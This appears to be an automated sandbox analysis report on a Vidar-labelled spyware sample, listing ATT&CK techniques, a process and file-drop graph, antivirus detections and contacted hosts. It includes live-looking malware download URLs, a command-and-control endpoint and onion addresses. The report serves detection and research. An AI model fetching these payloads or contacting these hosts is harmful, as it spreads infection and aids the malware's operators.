                  Employee NamesVirtual Private ServerLocal Accounts2
                  Command and Scripting Interpreter                  		2
                  Registry Run Keys / Startup Folder                  		2
                  Registry Run Keys / Startup Folder                  		211
                  Software Packing                  		NTDS147
                  System Information Discovery                  		Distributed Component Object ModelInput Capture11
                  Non-Standard Port                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts1
                  Scheduled Task/Job                  		Network Logon ScriptNetwork Logon Script1
                  Timestomp                  		LSA Secrets1
                  Query Registry                  		SSHKeylogging3
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials241
                  Security Software Discovery                  		VNCGUI Input Capture114
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Masquerading                  		DCSync141
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal Capture1
                  Proxy                  		Exfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                  Virtualization/Sandbox Evasion                  		Proc Filesystem12
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt411
                  Process Injection                  		/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Rundll32                  		Network Sniffing1
                  System Owner/User Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                  Remote System Discovery                  		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled TaskEmbedded PayloadsKeylogging1
                  System Network Configuration Discovery                  		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1406292 Sample: dl7WL77rkA Startdate: 11/03/2024 Architecture: WINDOWS Score: 100 84 pastebin.com 2->84 86 net.geo.opera.com 2->86 88 9 other IPs or domains 2->88 114 Snort IDS alert for network traffic 2->114 116 Found malware configuration 2->116 118 Malicious sample detected (through community Yara rule) 2->118 122 23 other signatures 2->122 10 dl7WL77rkA.exe 15 3 2->10         started        14 chrome.exe 2->14         started        16 cmd.exe 2->16         started        18 2 other processes 2->18 signatures3 120 Connects to a pastebin service (likely for C&C) 84->120 process4 dnsIp5 92 103.216.51.36 TCC-AS-APTodayCommunicationCoLtdKH Cambodia 10->92 94 103.47.93.223 SWIFTONLINE-AS-APSWIFTONLINEBORDERASIN India 10->94 96 105 other IPs or domains 10->96 140 Writes to foreign memory regions 10->140 142 Adds a directory exclusion to Windows Defender 10->142 144 Disables UAC (registry) 10->144 146 2 other signatures 10->146 20 AddInProcess32.exe 10->20         started        25 powershell.exe 23 10->25         started        27 AddInProcess32.exe 10->27         started        29 WerFault.exe 10->29         started        31 chrome.exe 14->31         started        33 conhost.exe 16->33         started        35 conhost.exe 18->35         started        signatures6 process7 dnsIp8 90 sty.ink 172.67.200.219 CLOUDFLARENETUS United States 20->90 68 C:\Users\...\yzAPe25HGnxqbkafYprXvqQ2.exe, PE32 20->68 dropped 70 C:\Users\...\yq7sRYx0zxf2nUHNI8myIvQb.exe, PE32 20->70 dropped 72 C:\Users\...\sUyDoVTGsfEnMY0oeyexTBut.exe, PE32 20->72 dropped 74 73 other malicious files 20->74 dropped 124 Drops script or batch files to the startup folder 20->124 126 Creates HTML files with .exe extension (expired dropper behavior) 20->126 37 kDgMkoNM3lKxwY8D8wOiP15F.exe 20->37         started        40 CGZL5y3D81OCbb2NABnHZhPM.exe 20->40         started        43 VT4T5BrKWgz9d48cmEd8ePkZ.exe 20->43         started        47 18 other processes 20->47 45 conhost.exe 25->45         started        file9 signatures10 process11 file12 76 C:\Users\user\AppData\Local\...\syncUpd.exe, PE32 37->76 dropped 78 C:\Users\user\AppData\Local\...\INetC.dll, PE32 37->78 dropped 80 C:\Users\user\AppData\...\BroomSetup.exe, PE32 37->80 dropped 49 syncUpd.exe 37->49         started        52 BroomSetup.exe 37->52         started        82 C:\Users\user\AppData\Local\...\wfplwfs.exe, PE32 40->82 dropped 128 Multi AV Scanner detection for dropped file 40->128 130 Found evasive API chain (may stop execution after checking mutex) 40->130 54 wfplwfs.exe 40->54         started        56 cmd.exe 40->56         started        132 Detected unpacking (changes PE section rights) 43->132 134 Detected unpacking (overwrites its own PE header) 43->134 136 Found Tor onion address 43->136 138 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 43->138 58 Conhost.exe 47->58         started        signatures13 process14 signatures15 98 Antivirus detection for dropped file 49->98 100 Multi AV Scanner detection for dropped file 49->100 102 Detected unpacking (changes PE section rights) 49->102 112 4 other signatures 49->112 104 Writes to foreign memory regions 54->104 106 Injects a PE file into a foreign processes 54->106 60 rundll32.exe 54->60         started        62 rundll32.exe 54->62         started        108 Uses ping.exe to sleep 56->108 110 Uses ping.exe to check the status of other devices and networks 56->110 64 conhost.exe 56->64         started        66 PING.EXE 56->66         started        process16

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  dl7WL77rkA.exe62%ReversingLabsWin64.Spyware.Vidar
                  dl7WL77rkA.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\syncUpd.exe100%AviraHEUR/AGEN.1316657
                  C:\Users\user\AppData\Local\S5LR4MxNYkipKICUEWwDRrcX.exe100%AviraTR/Crypt.XPACK.Gen7
                  C:\Users\user\AppData\Local\RLHqIpTNCBsmKjKBdfgpamFx.exe100%AviraTR/Crypt.XPACK.Gen7
                  C:\Users\user\AppData\Local\Temp\syncUpd.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\SNePs0JIjHDOAKzI11CQ043K.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\IiRP3mWif0xpaQsabblBwYAE.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\IpW6W2Yjx6z6D3j66j3N2tH5.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\H7TIhgIvG1Yhal1QnwrEdA0q.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\S5LR4MxNYkipKICUEWwDRrcX.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\RLHqIpTNCBsmKjKBdfgpamFx.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Jye7PnMsJdWwQaaabqxbHITx.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\4xb6JU3I8UdzuT7ogqFnBL7Y.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\RLHqIpTNCBsmKjKBdfgpamFx.exe58%ReversingLabsWin32.Trojan.RealProtect
                  C:\Users\user\AppData\Local\S5LR4MxNYkipKICUEWwDRrcX.exe58%ReversingLabsWin32.Trojan.RealProtect
                  C:\Users\user\AppData\Local\Temp\BroomSetup.exe75%ReversingLabsWin32.Trojan.Znyonm
                  C:\Users\user\AppData\Local\Temp\nsh1C9B.tmp\INetC.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\syncUpd.exe29%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\wfplwfs.exe47%ReversingLabsWin32.Trojan.RealProtect
                  C:\Users\user\AppData\Local\bAqeOotivBzC3mPFFhCilCro.exe58%ReversingLabsWin32.Trojan.RealProtect
                  C:\Users\user\AppData\Local\wHBfjqvEYiXClqcsZASJdtJJ.exe58%ReversingLabsWin32.Trojan.RealProtect
                  C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exe58%ReversingLabsWin32.Trojan.RealProtect
                  C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe58%ReversingLabsWin32.Trojan.RealProtect
                  C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exe58%ReversingLabsWin32.Trojan.RealProtect
                  C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exe58%ReversingLabsWin32.Trojan.RealProtect

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bitbucket.org
                  		104.192.141.1
                  		truefalse
                    yip.su
                    		172.67.169.89
                    		truefalse
                      github.com
                      		140.82.112.4
                      		truefalse
                        lawyerbuyer.org
                        		104.21.63.71
                        		truefalse
                          namemail.org
                          		172.67.178.183
                          		truefalse
                            ittrade.org
                            		172.67.177.133
                            		truefalse
                              pastebin.com
                              		104.20.68.143
                              		truetrue
                                sty.ink
                                		172.67.200.219
                                		truefalse
                                  iplogger.com
                                  		172.67.188.178
                                  		truefalse
                                    s3-w.us-east-1.amazonaws.com
                                    		52.217.234.57
                                    		truefalse
                                      ktxcomay.com.vn
                                      		222.255.238.159
                                      		truefalse
                                        grabify.org
                                        		172.67.168.159
                                        		truefalse
                                          artemis-rat.com
                                          		104.21.54.158
                                          		truetrue
                                            shipofdestiny.com
                                            		104.21.32.142
                                            		truefalse
                                              lati.lb.opera.technology
                                              		107.167.110.211
                                              		truefalse
                                                bbuseruploads.s3.amazonaws.com
                                                		unknown
                                                		unknowntrue
                                                  net.geo.opera.com
                                                  		unknown
                                                  		unknowntrue

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    https://namemail.org/6779d89b7a368f4f3f340b50a9d18d71.exefalse
                                                      https://github.com/TheSpeedX/PROXY-List/blob/master/http.txtfalse
                                                        http://185.172.128.126/InstallSetup5.exefalse
                                                          https://iplogger.com/1lyxzfalse
                                                            http://15.204.49.148/files/Silent.exefalse
                                                              http://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767false
                                                                http://185.172.128.145/3cd2b41cbde8fc9c.phptrue
                                                                  https://shipofdestiny.com/baf14778c246e15550645e30ba78ce1c.exefalse
                                                                    https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767false
                                                                      https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exefalse

                                                                        URLs from Memory and Binaries

                                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                                        https://datadumpcloud.orghttps://datadumpcloud.orgVvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3501355077.000000000C1C4000.00000004.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3380991027.000000000C012000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          https://bbuseruploads.s3.amazonaws.com/fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-AddInProcess32.exe, 00000005.00000002.4510003590.000000000308B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.00000000031BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            http://invalidlog.txtlookupVT4T5BrKWgz9d48cmEd8ePkZ.exe, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000400000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000400000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                              https://dumppage.orghttp://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionCommonProgrVT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3380987818.000000000C078000.00000004.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3381117576.000000000C108000.00000004.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3501355077.000000000C1DA000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                http://yandex.com/bots)OperaVT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exefalse
                                                                                  https://dumppage.orghttp://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionsUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3381117576.000000000C128000.00000004.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3380991027.000000000C07A000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                    https://github.com/Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exeBlackBerrVT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exefalse
                                                                                      http://185.172.128.187/HkDgMkoNM3lKxwY8D8wOiP15F.exe, 0000000D.00000002.2700588489.0000000000753000.00000004.00000020.00020000.00000000.sdmp, kDgMkoNM3lKxwY8D8wOiP15F.exe, 0000000D.00000003.2700108075.0000000000753000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        https://yip.su/redirect-AddInProcess32.exe, 00000005.00000002.4510003590.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.000000000305D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.0000000003449000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.0000000003439000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.0000000003429000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          https://ittrade.orgAddInProcess32.exe, 00000005.00000002.4510003590.000000000308B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            https://grabify.org/CGZL5y3D81OCbb2NABnHZhPM.exe, 0000000C.00000002.2361261570.00000000004FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              https://grabify.org/1wxSsCGZL5y3D81OCbb2NABnHZhPM.exe, 0000000C.00000002.2361261570.00000000004BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                https://grabify.org/1wxSuCGZL5y3D81OCbb2NABnHZhPM.exe, 0000000C.00000002.2361261570.00000000004FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  https://counter.yadro.ru/hit?AddInProcess32.exe, 00000005.00000002.4510003590.000000000305D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.0000000003449000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.0000000003439000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.0000000003429000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionhttp://papmcl4r32awafck75y5446nVT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3380987818.000000000C01A000.00000004.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3381117576.000000000C0A0000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                                      https://shipofdestiny.comAddInProcess32.exe, 00000005.00000002.4510003590.000000000350F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.000000000307D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.0000000003475000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        http://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionC:VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3380987818.000000000C07A000.00000004.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3501355077.000000000C1DC000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                                          http://www.avantbrowser.com)MOT-V9mm/VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exefalse
                                                                                                            http://185.172.128.145/3cd2b41cbde8fc9c.php_syncUpd.exe, 0000000F.00000002.2758288970.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              https://cdn.discordapp.com/attachments/1088058556286251082/1111230812579450950/TsgVtmYNoFT.zipMozillVT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exefalse
                                                                                                                https://shortiny.com/js/app.jsAddInProcess32.exe, 00000005.00000002.4510003590.000000000366D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.0000000003690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  https://turnitin.com/robot/crawlerinfo.html)cannotVT4T5BrKWgz9d48cmEd8ePkZ.exe, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000400000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000400000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                    http://www.exabot.com/go/robot)Opera/9.80VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exefalse
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAddInProcess32.exe, 00000005.00000002.4510003590.0000000002FE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        https://bitbucket.orgAddInProcess32.exe, 00000005.00000002.4510003590.000000000307D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          http://185.172.128.145/&syncUpd.exe, 0000000F.00000002.2758288970.0000000000996000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            http://www.bloglines.com)FrameVT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exefalse
                                                                                                                              http://o3fonzjs63n3ovdmbb5tfew6s7dpi4sirnapbiog67myalzi5pe5o2yd.onionhttp://o3fonzjs63n3ovdmbb5tfew6VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3501355077.000000000C1D0000.00000004.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3380991027.000000000C01A000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                                                                https://iplogger.comAddInProcess32.exe, 00000005.00000002.4510003590.000000000307D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  https://iplogger.org/privacy/AddInProcess32.exe, 00000005.00000002.4510003590.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.000000000305D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.0000000003449000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.0000000003439000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.0000000003429000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    http://185.172.128.145/3cd2b41cbde8fc9c.php1syncUpd.exe, 0000000F.00000002.2758288970.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      https://bbuseruploads.s3.amazonaws.comAddInProcess32.exe, 00000005.00000002.4510003590.000000000308B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        http://185.172.128.145/3cd2b41cbde8fc9c.php4syncUpd.exe, 0000000F.00000002.2758288970.0000000000996000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          https://dumppage.orghttps://dumppage.orgRegQueryValueExWhttps://dumppage.orgUUIDPGDSEPVT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3380987818.000000000C016000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            https://rsms.me/inter/inter.cssAddInProcess32.exe, 00000005.00000002.4510003590.000000000366D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.0000000003690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              http://185.172.128.145/3cd2b41cbde8fc9c.php8syncUpd.exe, 0000000F.00000002.2758288970.0000000000996000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                http://www.google.com/bot.html)crypto/ecdh:VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exefalse
                                                                                                                                                  http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls:VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exetrue
                                                                                                                                                    https://dumppage.orghttps://dumppage.orgRegQueryValueExWhttps://dumppage.orgUUIDUUIDPGDSEPGDSEsUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3381117576.000000000C09E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      http://o3fonzjs63n3ovdmbb5tfew6s7dpi4sirnapbiog67myalzi5pe5o2yd.onionVvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3501355077.000000000C1D0000.00000004.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3380991027.000000000C01A000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                                                                                        http://bitbucket.orgAddInProcess32.exe, 00000005.00000002.4510003590.0000000003452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          https://cdn.iplogger.org/favicon.icoAddInProcess32.exe, 00000005.00000002.4510003590.0000000003449000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.0000000003429000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            https://blockstream.info/apiinvaVT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exefalse
                                                                                                                                                              http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4VT4T5BrKWgz9d48cmEd8ePkZ.exe, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000400000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000400000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                http://yandex.com/bots)Opera/9.51VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exefalse
                                                                                                                                                                  https://shipofdestiny.com/baf14778c246e15550645e30ba78ce1c.exe%AddInProcess32.exe, 00000005.00000002.4510003590.000000000307D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    http://www.spidersoft.com)VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exefalse
                                                                                                                                                                      http://nsis.sf.net/NSIS_ErrorErrorAddInProcess32.exe, 00000005.00000002.4510003590.00000000036C1000.00000004.00000800.00020000.00000000.sdmp, kDgMkoNM3lKxwY8D8wOiP15F.exe, 0000000D.00000000.2237561133.000000000040B000.00000002.00000001.01000000.0000000B.sdmp, 3BiVM2uOsvGVXA1BoDorVuCU.exe, 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmp, BTnjKpTBDzKtQo69b5SrwYDx.exe, 00000013.00000002.4477722123.000000000040B000.00000002.00000001.01000000.00000010.sdmp, yq7sRYx0zxf2nUHNI8myIvQb.exe, 00000017.00000002.4483730306.000000000040B000.00000002.00000001.01000000.00000016.sdmp, yzAPe25HGnxqbkafYprXvqQ2.exe, 00000018.00000000.2349135460.000000000040B000.00000002.00000001.01000000.00000017.sdmpfalse
                                                                                                                                                                        https://cdn.iplogger.org/redirect/brand.pngAddInProcess32.exe, 00000005.00000002.4510003590.0000000003449000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4510003590.0000000003429000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://dumppage.orghttp://papmcl4r32awafck75y5446n252qqqq4h6c4y2slaayposrtfbcebdqd.onionhttps://dumsUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3381117576.000000000C0D6000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                                                                                                            http://185.172.128.126/InstallSetup5.exe2AddInProcess32.exe, 00000005.00000002.4510003590.0000000003176000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://shipofdestiny.com/baf14778c246e15550645e30ba78ce1c.exe4AddInProcess32.exe, 00000005.00000002.4510003590.0000000003176000.00000004.00000800.00020000.00000000.sdmpfalse
